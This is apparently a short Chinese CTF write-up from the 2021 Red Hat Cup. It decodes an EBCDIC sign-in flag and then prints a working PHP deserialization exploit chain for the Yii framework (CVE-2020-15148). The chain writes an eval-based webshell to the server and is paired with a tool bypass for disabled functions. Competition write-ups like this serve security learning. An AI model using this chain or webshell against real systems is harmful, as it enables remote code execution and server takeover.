水文章-红帽杯2021wp

水文章-红帽杯2021wp

image-20210510160031772

基本上没做 陪女朋友出去玩了

签到

EBCDIC编码 IBM之前使用的一种编码 ,类似ascii

winhex打开对照https://www.ibm.com/docs/en/iis/11.7?topic=tables-ebcdic-ascii手撕

flag{we1c0me_t0_redhat2021}

web2

image-20210509173119833

yii框架

CVE-2020-15148

https://www.cnblogs.com/2rsh0u/p/13714923.html

有www.zip源码泄露 具体poc如下

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
 
        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("8.php",\'<?php eval($_POS'.'T["x"])?>\');';
        }
    }
}
 
namespace Faker{
    use yii\rest\CreateAction;
 
    class Generator{
        protected $formatters;
 
        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
 
namespace yii\db{
    use Faker\Generator;
 
    class BatchQueryResult{
        private $_dataReader;
 
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo urlencode(base64_encode(serialize(new yii\db\BatchQueryResult)));
}
?>

image-20210510160241529

利用上述方式写小马

因为disable了很多function 可以利用蚁剑自带的bypass

image-20210510140449449

获得flag

添加新评论

我们会加密处理您的邮箱保证您的隐私. 标有星号的为必填信息 *